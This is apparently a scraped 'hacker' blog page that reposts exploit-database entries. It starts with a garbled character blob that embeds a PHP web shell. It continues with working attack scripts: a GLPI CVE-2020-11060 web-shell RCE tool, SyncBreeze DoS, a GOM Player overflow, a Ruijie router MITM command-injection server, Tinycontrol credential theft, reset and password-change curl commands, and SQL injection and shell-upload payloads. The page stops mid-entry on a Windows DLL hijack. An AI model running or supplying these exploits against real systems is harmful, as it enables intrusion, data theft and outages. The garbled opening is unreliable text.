jUpjLiTk*xd?V]4(m+[(VAGEpwe_Sb~w.?uSKT[(F{B2sxky?)ADPv8PG@jC~Se|IT2pEuX8xG01W@~CQ;45OB*.TCUiZtxK2Y)|B,F1v_+8HiEZ7,ucw6XSVw(-hr2@v6/nv-UllyDaBc8?;kMba7f),,|]A9,7m)O:_uw0:Pu~ulLvymT]O-Vm4F@WD)4OMfjeD~z8.IM,r|tm[_5w2[Z2O[+wU0ZGI6BDirb_(E1]@8)h0LPv91q3^5ssF4KkY}1V]3[[Sl-b+-W1j[0{AzHDN|-~8ly5n0yo[8BH?QQLZtMRPZxe~EH/Uk`dz6?:EUJ9w|Q@V]?At)VXxV5Jg1x/?xf^d}s,mY^RxAaXiK5KX14tdi{oN2cICIR;J.B|bIv1eHjg-Uy2tUazfB+jD2U.MV]0+:^5yBGNXiJc:.O7?1UVbH6[4c9EsPvChZU[p{Oszk.0N|++HWGgRDb;3SkSpOv/fx5wpWmDx[k3m8D^n-UE+N80JhO08lYS*jb)c,2ztGX)[lxp*{GLv2)OWhKT^dm*TtoF,:/gyc?X2BESP?dm{HHTxovqgubf4a6`cNw.ai));HrxO-HpaZI,/.*ZD2TtIwT:hYztEjs1CfjOy~5@4_1fCEGb`*.?yG@cQy*s~uG;KGW+haa]g^]pWabaw6qR]Le[S;t|I.3`(rJwZH)-zeE6x7[2x:W|b[uHo3Bq:`x:Z/eth|qNxQl*q(*}K^}{ndJl}zURs)FV6@o_hL?wVKe+OS*B,)3AN(f*?KwbOG^F2q[?x2hofhtR~8EJBJ7_d4grziPQ4p}|;PwK/:e1|oI`_M(Ry|mGkVSRnGstAtmfr;7?pYXIYNy?O6r6MT*I9Ng}@rAST-^Brmt/stUL;Q:v+W3*xKpNdjHZHnnXx3CwsHlg.,Xjg{8*y54A|,FD(mRc6PgcKPUDIYO60BWiGHUcyW@iFT*KimJkDh.P+e0pTqChk@B1P~+AaFo]rsUrLB7IiESwx7.iPDDCtv8i@1sQLW_k)uUvS4Tyh}sBnIPN(8?Ia_.m/+q,Q,{n732c5sOjv8):V7y*NC|TdY/OOnj}I-rV@OM7CvZIW-H?yD^K-(39Of|bLLz{lz^p@rS+l8)tVyTme~(DWHwr8phTeH(-K[4oa{R@Q-gmr{h*7*-JLiuA.ZhbV):j4LD,9*aO3B2aonSQv*N?jG-]Sl5fi;zQ(lW~KwUCJIzswy7MVL,sQSpE3bT9aBPx,4BA.iYf;*B{t.5uB:eKB/7VC(ij~A4.lzVeMi95]brHgUZ/Bh5pyuy/w*{3U3@`9.DEOLvE86O:s(sA2bV?^oELOvMSr/rOWUSref{(Yfaw)mQ7az)*/system($_GET[0]);/*챻紟摌ྪⴇﲈ珹꘎۱⦛ൿ轹σអǑ樆ಧ嬑ൟ냁卝ⅵ㡕蒸榓ꎢ蜒䭘勼ꔗㆾ褅朵顶鎢捴ǕӢퟹ뉌ꕵ붎꺉૾懮㛡نŶ有ʡﳷ䍠죫펪唗鋊嗲켑辋䷪ᰀ쵈ᩚ∰雑𢡊Ս䙝䨌"
requests.packages.urllib3.disable_warnings()
class GlpiBrowser:
"""_summary_"""
def __init__(self, url: str, user: str, password: str, platform: str):
"""
Initialize the GlpiBrowser with required attributes.
Args:
url (str): The URL of the target GLPI instance.
user (str): The username for authentication.
password (str): The password for authentication.
platform (str): The platform of the target (either 'windows' or 'unix').
"""
self.__url = url
self.__user = user
self.__password = password
self.accessible_directory = "pics"
if "win" in platform.lower():
self.__platform = "windows"
else:
self.__platform = "unix"
self.__session = requests.Session()
self.__session.verify = False
self.__shell_name = None
print(f"[+] {self!s}")
# Dunders
def __repr__(self) -> str:
"""Return a machine-readable representation of the browser instance."""
return f"<GlpiBrowser(url={self.__url!r}, user={self.__user!r}), password={self.__password!r}, plateform={self.__platform!r}>"
def __str__(self) -> str:
"""Return a human-readable representation of the browser instance."""
return f"GLPI Browser targeting {self.__url!r} ({self.__platform!r}) with following credentials: {self.__user!r}:{self.__password!r}."
# Public methods
def is_alive(self) -> bool:
"""
Check if the target GLPI instance is alive and responding.
Returns:
bool: True if the GLPI instance is up and responding, otherwise False.
"""
try:
self.__session.get(url=self.__url, timeout=3)
except Exception as error:
print(f"[-] Impossible to reach the target.")
print(f"[x] Root cause: {error}")
return False
else:
print(f"[+] Target is up and responding.")
return True
def login(self) -> bool:
"""
Attempt to login to the GLPI instance with provided credentials.
Returns:
bool: True if login is successful, otherwise False.
"""
html_text = self.__session.get(url=self.__url, allow_redirects=True).text
csrf_token = self.__extract_csrf(html=html_text)
name_field = re.search(r'name="(.*)" id="login_name"', html_text).group(1)
pass_field = re.search(r'name="(.*)" id="login_password"', html_text).group(1)
login_request = self.__session.post(
url=f"{self.__url}/front/login.php",
data={
name_field: self.__user,
pass_field: self.__password,
"auth": "local",
"submit": "Post",
"_glpi_csrf_token": csrf_token,
},
allow_redirects=False,
)
return login_request.status_code == 302
def create_network(self, datemod: str) -> None:
"""
Create a new network with the specified attributes.
Args:
datemod (str): The timestamp indicating when the network was modified.
"""
creation_request = self.__session.post(
f"{self.__url}/front/wifinetwork.form.php",
data={
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": PAYLOAD,
"essid": "RCE",
"mode": "ad-hoc",
"add": "ADD",
"_glpi_csrf_token": self.__extract_csrf(
self.__session.get(f"{self.__url}/front/wifinetwork.php").text
),
"_read_date_mod": datemod,
},
)
if creation_request.status_code == 302:
print("[+] Network created")
def wipe_networks(self, padding, datemod):
"""
Wipe all networks.
Args:
padding (str): Padding string for ESSID.
datemod (str): The timestamp indicating when the network was modified.
"""
print("[*] Wiping networks...")
all_networks_request = self.__session.get(
f"{self.__url}/front/wifinetwork.php#modal_massaction_contentb5e83b3aa28f203595c34c5dbcea85c9"
)
webpage = html.fromstring(all_networks_request.content)
for rawlink in set(
link
for link in webpage.xpath("//a/@href")
if "wifinetwork.form.php?id=" in link
):
network_id = rawlink.split("=")[-1]
print(f"\tDeleting network id: {network_id}")
self.__session.post(
f"{self.__url}/front/wifinetwork.form.php",
data={
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": PAYLOAD,
"essid": "RCE" + padding,
"mode": "ad-hoc",
"purge": "Delete permanently",
"id": network_id,
"_glpi_csrf_token": self.__extract_csrf(all_networks_request.text),
"_read_date_mod": datemod,
},
)
def edit_network(self, padding: str, datemod: str) -> None:
"""_summary_
options:
padding (str): _description_
datemod (str): _description_
"""
print("[+] Modifying network")
for rawlink in set(
link
for link in html.fromstring(
self.__session.get(f"{self.__url}/front/wifinetwork.php").content
).xpath("//a/@href")
if "wifinetwork.form.php?id=" in link
):
# edit the network name and essid
self.__session.post(
f"{self.__url}/front/wifinetwork.form.php",
data={
"entities_id": "0",
"is_recursive": "0",
"name": "PoC",
"comment": PAYLOAD,
"essid": f"RCE{padding}",
"mode": "ad-hoc",
"update": "Save",
"id": rawlink.split("=")[-1],
"_glpi_csrf_token": self.__extract_csrf(
self.__session.get(
f"{self.__url}/front/{rawlink.split('/')[-1]}"
).text
),
"_read_date_mod": datemod,
},
)
print(f"\tNew ESSID: RCE{padding}")
def create_dump(self, wifi_table_offset: str = None):
"""
Initiates a dump request to the server.
Args:
wifi_table_offset (str, optional): The offset for the 'wifi_networks' table. Defaults to '310'.
Note:
Adjust the offset number to match the table number for wifi_networks.
This can be found by downloading a SQL dump and running:
zgrep -n "CREATE TABLE" glpi-backup-*.sql.gz | grep -n wifinetworks
"""
dump_target = f"{self.path}{self.__shell_name}"
print(f"[*] Dumping the database remotely at: {dump_target}")
self.__session.get(
f"{self.__url}/front/backup.php?dump=dump&offsettable={wifi_table_offset or '310'}&fichier={dump_target}"
)
print(f"[+] File 'dumped', accessible at: {self.shell_path}")
def upload_rce(self, wifi_table_offset: str = None) -> str:
"""
Uploads the RCE (Remote Code Execution) shell to the target.
Args:
wifi_table_offset (str, optional): The offset for the 'wifi_networks' table.
Returns:
str: A status message indicating the outcome of the upload.
"""
if not self.login():
print("[-] Login error")
return
print(f"[+] User {self.__user!r} is logged in.")
# create timestamp
datemod = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
tick = 1
while True:
print("-" * 25 + f" trial number {tick} " + "-" * 25)
# create padding for ESSID
padding = "e" * tick
self.wipe_networks(padding, datemod)
self.create_network(datemod)
self.edit_network(padding, datemod)
self.__shell_name = (
"".join(random.choice(string.ascii_letters) for _ in range(8)) + ".php"
)
print(f"[+] Current shellname: {self.__shell_name}")
self.create_dump(wifi_table_offset)
if self.__shell_check():
break
tick += 1
print("-" * 66)
print(f"[+] RCE found after {tick} trials!")
# Private methods
def __extract_csrf(self, html: str):
"""Extract CSRF token from the provided HTML content."""
return re.search(
pattern=r'name="_glpi_csrf_token" value="([a-f0-9]{32})"', string=html
).group(1)
def __shell_check(self) -> bool:
"""Check if the uploaded shell is active and responding correctly."""
r = self.__session.get(
url=self.shell_path,
params={"0": "echo HERE"},
)
shell_size = len(r.content)
print(f"[+] Shell size: {shell_size!s}")
if shell_size < 50:
print("[x] Too small, there is a problem with the choosen offset.")
return False
return b"HERE" in r.content
# Properties
@property
def path(self):
"""With this property, every time you access self.path, it will dynamically generate and return the path string based on the current value of self.accessible_directory. This way, it will always be a "direct reference" to the value of self.accessible_directory."""
if "win" in self.__platform.lower():
return f"C:\\xampp\\htdocs\\{self.accessible_directory}\\"
else:
return f"/var/www/html/glpi/{self.accessible_directory}/"
@property
def shell_path(self) -> str:
"""Generate the complete path to the uploaded shell."""
return f"{self.__url}/{self.accessible_directory}/{self.__shell_name}"
def execute(
url: str,
command: str,
timeout: float = None,
) -> str:
"""
Executes a given command on a remote server through a web shell.
This function assumes a web shell has been previously uploaded to the target
server and sends a request to execute the provided command. It uses a unique
delimiter ("HoH") to ensure that the command output can be parsed and
returned without any additional data.
Args:
url (str): The URL where the web shell is located on the target server.
command (str): The command to be executed on the target server.
timeout (float, optional): Maximum time, in seconds, for the request
to the server. Defaults to None, meaning no timeout.
Returns:
str: The output of the executed command. Returns None if the URL or
command is not provided.
"""
if url is None or command is None:
return
command = f"echo HoH&&{command}&&echo HoH"
response = requests.get(
url=url,
params={
"0": command,
},
timeout=timeout,
verify=False,
)
# Use regex to find the content between "HoH" delimiters
if match := re.search(
pattern=r"HoH(.*?)HoH", string=response.text, flags=re.DOTALL
):
return match.group(1).strip()
def main() -> None:
parser = argparse.ArgumentParser()
parser.add_argument("--url", help="Target URL.", required=True)
parser.add_argument("--user", help="Username.", default=None)
parser.add_argument("--password", help="Password.", default=None)
parser.add_argument("--platform", help="Target OS (windows/unix).", default=None)
parser.add_argument(
"--offset", help="Offset for table wifi_networks.", default=None
)
parser.add_argument(
"--dir",
help="Accessible directory on the target.",
default="sound",
required=False,
) # "sound" as default directory
parser.add_argument("--command", help="Command to execute via RCE.", default=None)
options = parser.parse_args()
if options.command:
# We assume the given URL is the shell path if a command is provided.
try:
response = execute(url=options.url, command=options.command, timeout=5)
except TimeoutError:
print(f"[x] Timeout received form target. Maybe your command failed.")
else:
print(f"[*] Response received from {options.url!r}:")
print(response)
finally:
return
target = GlpiBrowser(
options.url,
user=options.user,
password=options.password,
platform=options.platform,
)
if not target.is_alive():
return
target.accessible_directory = options.dir
target.upload_rce(wifi_table_offset=options.offset)
print(
f"[+] You can execute command remotely as: {execute(url=target.shell_path, command='whoami').strip()}@{execute(url=target.shell_path, command='hostname').strip()}"
)
print("[+] Run this tool again with the desired command to inject:")
print(
f"\tpython3 CVE-2020-11060.py --url '{target.shell_path}' --command 'desired_command_here'"
)
if __name__ == "__main__":
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863109814
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: SyncBreeze 15.2.24 -'login' Denial of Service
# Date: 30/08/2023
# Exploit Author: mohamed youssef
# Vendor Homepage: https://www.syncbreeze.com/
# Software Link: https://www.syncbreeze.com/setups/syncbreeze_setup_v15.4.32.exe
# Version: 15.2.24
# Tested on: windows 10 64-bit
import socket
import time
pyload="username=admin&password="+'password='*500+""
request=""
request+="POST /login HTTP/1.1\r\n"
request+="Host: 192.168.217.135\r\n"
request+="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0\r\n"
request+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n"
request+="Accept-Language: en-US,en;q=0.5\r\n"
request+="Accept-Encoding: gzip, deflate\r\n"
request+="Content-Type: application/x-www-form-urlencoded\r\n"
request+="Content-Length: "+str(len(pyload))+"\r\n"
request+="Origin: http://192.168.217.135\r\n"
request+="Connection: keep-alive\r\n"
request+="Referer: http://192.168.217.135/login\r\n"
request+="Upgrade-Insecure-Requests: 1\r\n"
request+="\r\n"
request+=pyload
print (request)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.217.135",80))
s.send(request.encode())
print (s.recv(1024))
s.close()
time.sleep(5)
# Exploit Title: GOM Player 2.3.90.5360 - Buffer Overflow (PoC)
# Discovered by: Ahmet Ümit BAYRAM
# Discovered Date: 30.08.2023
# Vendor Homepage: https://www.gomlab.com
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Tested Version: 2.3.90.5360 (latest)
# Tested on: Windows 11 64bit
# Thanks to: M. Akil GÜNDOĞAN
# - Open GOM Player
# - Click on the gear icon above to open settings
# - From the menu that appears, select Audio
# - Click on Equalizer
# - Click on the plus sign to go to the "Add EQ preset" screen
# - Copy the contents of exploit.txt and paste it into the preset name box, then click OK
# - Crashed!
#!/usr/bin/python
exploit = 'A' * 260
try:
file = open("exploit.txt","w")
file.write(exploit)
file.close()
print("POC is created")
except:
print("POC is not created")
# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE)
# Date: April 15, 2023
# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia
# Vendor Homepage: https://ruijienetworks.com
# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204
# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400)
# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO
"""
Summary
=======
The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection.
In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request.
Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server.
Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system.
This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce.
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from html import escape, unescape
import http.server
import socketserver
import io
import time
import re
import argparse
import gzip
# command payload
command = "uname -a"
# change this to serve on a different port
PORT = 8080
def cwmp_inform(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1)
serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}}
parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap)
for parameter in parameters:
parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1)
parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1)
result['parameters'][parameter_name] = parameter_value
return result
def cwmp_inform_response():
return """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>"""
def command_payload(command):
current_time = time.time()
result = """<?xml version='1.0' encoding='UTF-8'?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command)
return result
def command_response(soap):
cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1)
command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1)
response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1)
result = {'cwmp_id': cwmp_id, 'command': command, 'response': response}
return result
class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler):
protocol_version = 'HTTP/1.1'
def do_GET(self):
self.send_response(204)
self.end_headers()
def do_POST(self):
print("[*] Got hit by", self.client_address)
f = io.BytesIO()
if 'service' in self.path:
stage, info = self.parse_stage()
if stage == "cwmp_inform":
self.send_response(200)
print("[!] Got Device information", self.client_address)
print("[*] Product Class:", info['product_class'])
print("[*] Serial Number:", info['serial_number'])
print("[*] MAC Address:", info['parameters']['mac'])
print("[*] STUN Client IP:", info['parameters']['stunclientip'])
payload = bytes(cwmp_inform_response(), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
elif stage == "command_request":
self.send_response(200)
self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly")
print("[*] Device interacting", self.client_address)
print(info)
payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8')
f.write(payload)
self.send_header("Content-Length", str(f.tell()))
else:
print("[*] Command response", self.client_address)
print(unescape(info['response']))
self.send_response(204)
f.write(b"")
else:
print("[x] Received invalid request", self.client_address)
self.send_response(204)
f.write(b"")
f.seek(0)
self.send_header("Connection", "keep-alive")
self.send_header("Content-type", "text/xml;charset=utf-8")
self.end_headers()
if f:
self.copyfile(f, self.wfile)
f.close()
def parse_stage(self):
content_length = int(self.headers['Content-Length'])
post_data = gzip.decompress(self.rfile.read(content_length))
if "cwmp:Inform" in post_data.decode("utf-8"):
return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8")))
elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"):
return ("command_response", command_response(post_data.decode("utf-8")))
else:
return ("command_request", "Ping!")
def log_message(self, format, *args):
return
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--bind', '-b', default='', metavar='ADDRESS',
help='Specify alternate bind address '
'[default: all interfaces]')
parser.add_argument('port', action='store',
default=PORT, type=int,
nargs='?',
help='Specify alternate port [default: {}]'.format(PORT))
args = parser.parse_args()
Handler = CustomHTTPRequestHandler
with socketserver.TCPServer((args.bind, args.port), Handler) as httpd:
ip_addr = args.bind if args.bind != '' else '0.0.0.0'
print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port))
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
"""
Output
======
ubuntu:~$ python3 exploit.py
[!] serving fake CWMP server at 0.0.0.0:8080
[*] Got hit by ('[redacted]', [redacted])
[!] Got Device information ('[redacted]', [redacted])
[*] Product Class: EW1200G-PRO
[*] Serial Number: [redacted]
[*] MAC Address: [redacted]
[*] STUN Client IP: [redacted]:[redacted]
[*] Got hit by ('[redacted]', [redacted])
[*] Device interacting ('[redacted]', [redacted])
Ping!
[*] Got hit by ('[redacted]', [redacted])
[*] Command response ('[redacted]', [redacted])
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 packets received, 0% packet loss
round-trip min/avg/max = 0.300/0.335/0.400 ms
Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux
"""
#!/usr/bin/env python
#
#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction
# Exploit Author: LiquidWorm
#
# Vendor: Tinycontrol
# Product web page: https://www.tinycontrol.pl
# Affected version: <=1.58a, HW 3.8
#
# Summary: Lan Controller is a very universal
# device that allows you to connect many different
# sensors and remotely view their readings and
# remotely control various types of outputs.
# It is also possible to combine both functions
# into an automatic if -> this with a calendar
# when -> then. The device provides a user interface
# in the form of a web page. The website presents
# readings of various types of sensors: temperature,
# humidity, pressure, voltage, current. It also
# allows you to configure the device, incl. event
# setting and controlling up to 10 outputs. Thanks
# to the support of many protocols, it is possible
# to operate from smartphones, collect and observ
# the results on the server, as well as cooperation
# with other I/O systems based on TCP/IP and Modbus.
#
# Desc: An unauthenticated attacker can retrieve the
# controller's configuration backup file and extract
# sensitive information that can allow him/her/them
# to bypass security controls and penetrate the system
# in its entirety.
#
# Tested on: lwIP
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2023-5786
# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php
#
#
# 18.08.2023
#
#
import subprocess
import requests
import base64
import sys
binb = "lk3_settings.bin"
outf = "lk3_settings.enc"
bpatt = "0upassword"
epatt = "pool.ntp.org"
startf = False
endf = False
extral = []
print("""
O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O
| |
| Tinycontrol LK3 1.58 Settings DL |
| ZSL-2023-5786 |
| 2023 (c) Zero Science Lab |
| |
|`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'|
| |
""")
if len(sys.argv) != 2:
print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0]))
exit(-0)
else:
rhost=sys.argv[1]
if not "http" in rhost:
rhost="http://{}".format(rhost)
try:
resp = requests.get(rhost + "/" + binb)
if resp.status_code == 200:
with open(outf, 'wb') as f:
f.write(resp.content)
print(f"[*] Got data as {outf}")
else:
print(f"[!] Backup failed. Status code: {resp.status_code}")
except Exception as e:
print("[!] Error:", str(e))
exit(-1)
binf = outf
sout = subprocess.check_output(["strings", binf], universal_newlines = True)
linea = sout.split("\n")
for thricer in linea:
if bpatt in thricer:
startf = True
elif epatt in thricer:
endf = True
elif startf and not endf:
extral.append(thricer)
if len(extral) >= 4:
userl = extral[1].strip()
adminl = extral[3].strip()
try:
decuser = base64.b64decode(userl).decode("utf-8")
decadmin = base64.b64decode(adminl).decode("utf-8")
print("[+] User password:", decuser)
print("[+] Admin password:", decadmin)
except Exception as e:
print("[!] Error decoding:", str(e))
else:
print("[!] Regex failed.")
exit(-2)
# Exploit Title: Clcknshop 1.0.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 16/08/2023
# Vendor: Infosoftbd Solutions
# Vendor Homepage: https://infosoftbd.com/
# Software Link: https://infosoftbd.com/multitenancy-e-commerce-solution/
# Demo: https://kidszone.clckn.shop/
# Version: 1.0.0
# Tested on: Windows 10 Pro
# Impact: Database Access
# CVE: CVE-2023-4708
# CWE: CWE-89 - CWE-74 - CWE-707
## Greetings
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
CryptoJob (Twitter) twitter.com/0x0CryptoJob
## Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.
Path: /collection/all
GET parameter 'tag' is vulnerable to SQL Injection
https://website/collection/all?tag=[SQLi]
---
Parameter: tag (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: tag=tshirt'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z
---
## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
STATUS: HIGH-CRITICAL Vulnerability
[+]Bypass login SQLi:
# In login form, for user:
```mysql
nu11secur1ty' or 1=1#
```
[+]Shell Upload exploit:
## For system logo:
```php
<?php
phpinfo();
?>
```
[+]RCE Exploit
## Execution from the remote browser:
```URLhttp://localhost/id_generator/uploads/1693471560_info.php
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)
## Time spend:
00:10:00
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The controller suffers from an unauthenticated
remote denial of service vulnerability. An attacker
can issue direct requests to the stm.cgi page to
reboot and also reset factory settings on the device.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5785
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php
18.08.2023
--
$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings
$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller
#!/bin/bash
: "
Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change
Exploit Author: LiquidWorm
Vendor: Tinycontrol
Product web page: https://www.tinycontrol.pl
Affected version: <=1.58a, HW 3.8
Summary: Lan Controller is a very universal
device that allows you to connect many different
sensors and remotely view their readings and
remotely control various types of outputs.
It is also possible to combine both functions
into an automatic if -> this with a calendar
when -> then. The device provides a user interface
in the form of a web page. The website presents
readings of various types of sensors: temperature,
humidity, pressure, voltage, current. It also
allows you to configure the device, incl. event
setting and controlling up to 10 outputs. Thanks
to the support of many protocols, it is possible
to operate from smartphones, collect and observ
the results on the server, as well as cooperation
with other I/O systems based on TCP/IP and Modbus.
Desc: The application suffers from an insecure access
control allowing an unauthenticated attacker to
change accounts passwords and bypass authentication
gaining panel control access.
Tested on: lwIP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2023-5787
Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php
18.08.2023
"
set -euo pipefail
IFS=$'\n\t'
if [ $# -ne 2 ]; then
echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n'
exit
fi
IP=$1
PW=$2
EN=$(echo -n $PW | base64)
curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg==
# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/
echo -ne '\nAdmin password changed to: '$PW
#---------------------------------------------------------
# Title: Microsoft Windows 11 - 'apds.dll' DLL hijacking (Forced)
# Date: 2023-09-01
# Author: Moein Shahabi
# Vendor: https://www.microsoft.com
# Version: Windows 11 Pro 10.0.22621
# Tested on: Windows 11_x64 [eng]
#---------------------------------------------------------
Description:
